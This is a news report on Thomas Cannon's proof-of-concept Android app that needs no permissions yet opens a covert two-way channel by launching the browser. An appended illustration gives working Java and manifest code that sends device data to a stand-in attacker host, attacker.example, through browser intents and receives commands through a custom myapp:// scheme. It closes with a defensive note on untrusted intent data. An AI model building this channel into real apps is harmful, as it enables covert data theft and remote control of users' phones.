A security researcher has developed a proof-of-concept Android application that requests no user permissions at installation time, yet could still give an attacker remote access to the device.
The app uses a known issue with Android web search to establish a two-way communication channel with a third party, ViaForensics director of research and development Thomas Cannon told ZDNet UK on Wednesday.
"On its own this attack could really only be used to read any data on the SD card, read some data shared by other apps, and read limited data about the device," Cannon told ZDNet UK in an email interview. "Combined with other vulnerabilities it can be expanded, for example it could download a root exploit at a later point in time and gain total control over the device, or it could leverage other unprotected capabilities that may exist on the device to, for example, send premium rate SMS."
When a user installs an Android app, the device normally prompts the user with the permissions the app is requesting (for example, access to geolocation data, phone storage, or the camera), which is meant to alert the user to suspicious requests. Cannon's app declares none, so the user sees no such warning.
Once installed, Cannon's proof of concept waits until the phone is locked and then opens a communications channel by launching the web browser, according to a video by Cannon. This establishes a shell and allows semi-covert access, Cannon told ZDNet UK.
"The proof-of-concept is not completely covert since the web browser will need to be in the foreground during the attack," Cannon told ZDNet UK. "However, once complete, you can, to a degree, make things look normal again for the user. Technically there will still be some traces that the attack happened left behind if the user looks."
The app does not exploit a flaw in Android so much as a feature, said Cannon.
"The app doesn't use a vulnerability in the browser as such, it simply calls the browser and passes it the URL of the attacker's server," said Cannon. "Except that the URL contains the data we want to send to the attacker. Similarly, to receive data the browser gets redirected to a custom URL scheme the app has registered (e.g. myapp://host/some+data) which calls our app and passes it the data in the URL. That way we establish two-way communication."
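The mechanism Cannon describes, written out as an added illustration (this is not Cannon's code and was not published with the article). It shows both directions: an ACTION_VIEW intent that hands the browser a URL with the outbound data in its query string, and an intent filter on the scheme myapp:// that lets a browser redirect launch the app with the inbound data in the URL. Everything in it is an assumption for the example: the package and class names, the attacker host attacker.example, the query parameter name d, and the use of URL-safe Base64 for the payload (Cannon's example URL uses plain text). Note that nothing in it needs a <uses-permission> entry.

```java
// Added example, not Thomas Cannon's proof of concept. Package, class, scheme
// details, server URL and encoding are all assumptions for illustration.
package com.example.covertchannel;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.util.Base64;

import java.nio.charset.StandardCharsets;

/*
 * Assumed AndroidManifest.xml entry for this Activity. The BROWSABLE category
 * is what lets the browser hand a myapp://host/... URL back to the app. The
 * manifest declares no <uses-permission>, so the install prompt shows nothing.
 *
 * <activity android:name=".ChannelActivity" android:exported="true">
 *   <intent-filter>
 *     <action android:name="android.intent.action.VIEW" />
 *     <category android:name="android.intent.category.DEFAULT" />
 *     <category android:name="android.intent.category.BROWSABLE" />
 *     <data android:scheme="myapp" android:host="host" />
 *   </intent-filter>
 * </activity>
 */
public class ChannelActivity extends Activity {

    // Assumed attacker endpoint; the article names no real host.
    private static final String SERVER = "http://attacker.example/c";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Inbound direction: the attacker's server answered an earlier request
        // with a redirect to myapp://host/<payload>. The browser cannot open that
        // scheme itself, so Android resolves it to this Activity via the intent
        // filter above and delivers the whole URL as the intent data.
        Uri incoming = getIntent().getData();
        if (incoming != null && "myapp".equals(incoming.getScheme())) {
            String command = decodeInbound(incoming);
            // A real sample would act on `command`; the example only echoes it
            // back, which also shows that each inbound message can trigger the
            // next outbound one, so the server controls the exchange's cadence.
            send("ack:" + command);
            return;
        }

        // Outbound direction on first launch: ship something harmless-looking.
        send("device=" + Build.MODEL);
    }

    /** Outbound: pack the data into the URL and let the browser make the request. */
    private void send(String data) {
        Uri target = Uri.parse(SERVER).buildUpon()
                .appendQueryParameter("d", encode(data))
                .build();
        // Starting the browser with a URL needs no permission of its own. The
        // browser does come to the foreground, which is why the channel is only
        // semi-covert.
        startActivity(new Intent(Intent.ACTION_VIEW, target));
    }

    /** Inbound: the payload is the last path segment of myapp://host/<payload>. */
    static String decodeInbound(Uri uri) {
        String segment = uri.getLastPathSegment();
        if (segment == null) {
            return "";
        }
        byte[] raw = Base64.decode(segment, Base64.URL_SAFE | Base64.NO_WRAP);
        return new String(raw, StandardCharsets.UTF_8);
    }

    /** URL-safe Base64 so the payload survives both a query string and a path. */
    static String encode(String s) {
        return Base64.encodeToString(s.getBytes(StandardCharsets.UTF_8),
                Base64.URL_SAFE | Base64.NO_WRAP);
    }
}
```

The server half is ordinary web plumbing: it reads the d parameter from the GET request and, when it has something to send back, responds with an HTTP redirect whose Location is a myapp://host/<payload> URL. The same filter that makes this work for the attacker is worth remembering from the defensive side: any web page the browser visits can launch a BROWSABLE activity with a URL of its choosing, so whatever an app reads from getIntent().getData() is attacker-controlled input and has to be validated as such.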